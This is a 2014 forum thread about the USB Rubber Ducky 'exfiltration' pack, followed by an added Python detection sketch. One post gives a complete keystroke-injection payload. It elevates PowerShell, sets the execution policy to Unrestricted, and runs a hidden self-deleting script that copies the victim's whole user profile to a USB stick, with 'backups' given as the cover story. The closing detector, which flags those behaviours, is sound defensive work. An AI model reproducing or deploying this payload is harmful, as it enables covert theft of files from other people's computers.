CreekBard, posted March 2, 2014:

Hi! Does someone know what the interest of the exfiltrator is? Do you know a concrete use of it? An example?

THCMinister, posted March 3, 2014:

Define Exfiltration: an antonym for infiltration, may stand for: The same as extraction (military) (also exfil).

Automated backups. You could regularly copy files to a backup location and the ducky could be used to perform the actions faster and automatically.

CreekBard, posted March 3, 2014:

I'm not sure I understand all of it, but do you know a possible use of it, with a script? Isn't it possible to use it automatically to save files found on a computer using the URD?

SFisher, posted March 6, 2014:

Well, there's the ducky slurp that does automatic backups. Darren Kitchen and OverWraith put this together.

https://forums.hak5.org/index.php?/topic/30179-payload-duck-slurp-v2-silent/?hl=+duck%20+slurp

Maybe this will inspire you.

CreekBard, posted March 7, 2014 (edited March 7, 2014 by CreekBard):

That looks interesting, thanks! So we can conclude that the Exfiltration pack just adds a USB key?

SFisher, posted March 8, 2014:

Pretty much. The USB makes it nice because if you happen to run out of time, the slurp just runs in the background until you return with the USB key. Darren did an episode of Hak5 on this script. I don't know the episode off the top of my head, but I'm sure it can't be too hard to find.

CreekBard, posted March 9, 2014:

If someone knows the episode, post it there please!

411Hall, posted March 9, 2014:

If you're interested, I have a slightly different version of the Ducky Slurp. Same premise as Darren's and Overwraith's, just written in PowerShell.

DELAY 3000
GUI r
DELAY 750
STRING powershell Start-Process notepad -Verb runAs
ENTER
DELAY 1500
ALT y
DELAY 500
ENTER
ALT SPACE
DELAY 100
STRING m
DELAY 200
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
ENTER
STRING $userDir = (Get-ChildItem env:\userprofile).value + '\'
ENTER
STRING $usbPresent = 'False'
ENTER
STRING do {
ENTER
STRING $present = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY' } | Measure
ENTER
STRING if ($present.Count -ge 1){
ENTER
STRING $usbPresent = 'True' }Else {
ENTER
STRING $usbPresent = 'False'}}
ENTER
STRING until ($usbPresent -eq 'True')
ENTER
STRING $driveLetter = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY' } | select Name
ENTER
STRING $usbPath = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY' } | select name
ENTER
STRING copy-item $userDir $usbPath.Name -recurse
ENTER
STRING Remove-Item $MyINvocation.InvocationName
ENTER
CTRL S
DELAY 1500
STRING C:\Windows\config.ps1
ENTER
DELAY 2000
ALT F4
DELAY 200
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 1500
ALT y
DELAY 500
STRING mode con:cols=14 lines=1
ENTER
ALT SPACE
DELAY 100
STRING m
DELAY 200
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
ENTER
STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
ENTER
DELAY 1000
STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1
ENTER

There is also a USB Reporting method on the Duck Toolkit.

411.
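
Added example, not part of the thread and not any poster's code: a Python sketch a defender could run over process command lines and PowerShell script-block text to flag the behaviours visible in the payload posted above (elevated launch, execution policy set to Unrestricted, hidden script run, volume-label polling, recursive copy). The rule names, host names, time window, threshold and sample events are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Behaviours visible in the payload posted above, as case-insensitive patterns (names are hypothetical).
RULES = {
    "elevated_launch": re.compile(r"start-process\s+\S+\s+-verb\s+runas", re.I),
    "policy_unrestricted": re.compile(r"set-executionpolicy\s+'?unrestricted", re.I),
    "hidden_script_run": re.compile(r"-w\w*\s+hidden\b.*-file\s+\S+\.ps1", re.I),
    "volume_label_poll": re.compile(r"win32_volume.*\.label\s+-eq", re.I | re.S),
    "recursive_copy": re.compile(r"copy-item\b.*-recurse", re.I | re.S),
}

# Constructed sample events: (timestamp, host, command line or script-block text).
SAMPLE_EVENTS = [
    ("2014-03-09T10:00:01", "WS01", "powershell Start-Process cmd -Verb runAs"),
    ("2014-03-09T10:00:09", "WS01", "powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false"),
    ("2014-03-09T10:00:11", "WS01", r"powershell.exe -windowstyle hidden -File C:\Windows\config.ps1"),
    ("2014-03-09T10:00:12", "WS01", "Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY' } | Measure"),
    ("2014-03-09T10:07:30", "WS01", "copy-item $userDir $usbPath.Name -recurse"),
    ("2014-03-09T11:15:00", "WS02", "powershell Set-ExecutionPolicy RemoteSigned -Scope CurrentUser"),
    ("2014-03-09T11:20:00", "WS02", r"Copy-Item .\build D:\release -Recurse"),
]

def match_rules(text):
    """Return the names of all rules that fire on one event's text."""
    return {name for name, rx in RULES.items() if rx.search(text)}

def correlate(events, window=timedelta(minutes=15), threshold=3):
    """Alert on hosts showing at least `threshold` distinct behaviours inside one window."""
    hits = {}
    for ts, host, text in events:
        when = datetime.fromisoformat(ts)
        for rule in match_rules(text):
            hits.setdefault(host, []).append((when, rule))
    alerts = {}
    for host, seen in hits.items():
        seen.sort()
        for i, (start, _) in enumerate(seen):
            rules = {r for t, r in seen[i:] if t - start <= window}
            if len(rules) >= threshold and len(rules) > len(alerts.get(host, ())):
                alerts[host] = rules
    return {h: sorted(r) for h, r in alerts.items()}

if __name__ == "__main__":
    for host, rules in correlate(SAMPLE_EVENTS).items():
        print(host, rules)
```

A single rule firing (for example a recursive copy during a build) does not alert; only the combination on one host within the window does.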